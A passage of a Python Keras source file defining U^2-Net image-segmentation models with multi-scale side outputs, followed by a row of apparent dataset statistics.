d5 = Activation(activation, name='d5')(d5)
'''
Total params: 3,738,541
Trainable params: 3,728,045
Non-trainable params: 10,496
'''
model = Model(inputs=inputs, outputs=[d, d1, d2, d3, d4, d5])
return model
def U2netM(input_shape=(320, 320, 3), classes=2, activation='softmax'):
inputs = Input(shape=input_shape)
hx1 = RSU7(inputs, 32, 64) # shape=(None, 320, 320, 32)
hx = MaxPool2D(pool_size=(2, 2))(hx1) # shape=(None, 160, 160, 32)
hx2 = RSU6(hx, 32, 64) # shape=(None, 160, 160, 32)
hx = MaxPool2D(pool_size=(2, 2))(hx2) # shape=(None, 80, 80, 32)
hx3 = RSU5(hx, 32, 128) # shape=(None, 80, 80, 32)
hx = MaxPool2D(pool_size=(2, 2))(hx3) # shape=(None, 40, 40, 64)
hx4 = RSU4(hx, 64, 128) # shape=(None, 40, 40, 64)
hx = MaxPool2D(pool_size=(2, 2))(hx4) # shape=(None, 20, 20, 128)
# ?
hx5 = RSU4F(hx, 128, 128) # shape=(None, 20, 20, 128)
hx = MaxPool2D(pool_size=(2, 2))(hx5) # shape=(None, 10, 10, 256
hx6 = RSU4F(hx, 256, 256) # shape=(None, 10, 10, 256)
hx6up = tf.compat.v1.image.resize_bilinear(hx6, (tf.shape(hx5)[1], tf.shape(hx5)[2]), True)
# hx6up = UpSampling2D(size=(2, 2))(hx6) # shape=(None, 20, 20, 256)
hx5d = concatenate([hx6up, hx5]) # shape=(None, 20, 20, 384)
hx5d = RSU4F(hx5d, 256, 256) # shape=(None, 20, 20, 256)
hx5up = tf.compat.v1.image.resize_bilinear(hx5d, (tf.shape(hx4)[1], tf.shape(hx4)[2]), True)
# hx5up = UpSampling2D(size=(2, 2))(hx5d) # shape=(None, 40, 40, 512)
hx4d = concatenate([hx5up, hx4]) # shape=(None, 40, 40, 640)
hx4d = RSU4(hx4d, 128, 256) # shape=(None, 40, 40, 128)
hx4up = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
# hx4up = UpSampling2D(size=(2, 2))(hx4d) # shape=(None, 80, 80, 128)
hx3d = concatenate([hx4up, hx3]) # shape=(None, 80, 80, 192)
hx3d = RSU5(hx3d, 32, 128) # shape=(None, 80, 80, 32)
hx3up = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
# hx3up = UpSampling2D(size=(2, 2))(hx3d) # shape=(None, 160, 160, 64)
hx2d = concatenate([hx3up, hx2]) # shape=(None, 160, 160, 96)
hx2d = RSU6(hx2d, 32, 64) # shape=(None, 160, 160, 32)
hx2up = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
# hx2up = UpSampling2D(size=(2, 2))(hx2d) # shape=(None, 320, 320, 32)
hx1d = concatenate([hx2up, hx1]) # shape=(None, 320, 320, 64)
hx1d = RSU7(hx1d, 16, 64)
d1 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx1d)
d2 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx2d)
d2 = tf.compat.v1.image.resize_bilinear(d2, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d3 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx3d) # shape=(None, 80, 80, 1)
d3 = tf.compat.v1.image.resize_bilinear(d3, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d4 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx4d) # shape=(None, 40, 40, 1)
d4 = tf.compat.v1.image.resize_bilinear(d4, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d5 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx5d) # shape=(None, 20, 20, 1)
d5 = tf.compat.v1.image.resize_bilinear(d5, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d = concatenate([d1, d2, d3, d4, d5])
d = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(d)
if activation in {'softmax', 'sigmoid'}:
d = Activation(activation, name='d')(d)
d1 = Activation(activation, name='d1')(d1)
d2 = Activation(activation, name='d2')(d2)
d3 = Activation(activation, name='d3')(d3)
d4 = Activation(activation, name='d4')(d4)
d5 = Activation(activation, name='d5')(d5)
'''
Total params: 26,829,661
Trainable params: 26,803,613
Non-trainable params: 26,048
'''
model = Model(inputs=inputs, outputs=[d, d1, d2, d3, d4, d5])
return model
if __name__ == "__main__":
import os
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
model1 = U2net(input_shape=(320, 320, 3))
model1.summary()
| 40.799065 | 119 | 0.631486 | 2,687 | 17,462 | 4.007815 | 0.058802 | 0.053301 | 0.038072 | 0.057108 | 0.868883 | 0.829418 | 0.813539 | 0.788281 | 0.781224 | 0.763395 | 0 | 0.115013 | 0.187894 | 17,462 | 427 | 120 | 40.894614 | 0.644383 | 0.128565 | 0 | 0.760417 | 0 | 0 | 0.012147 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.017361 | 0 | 0.079861 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.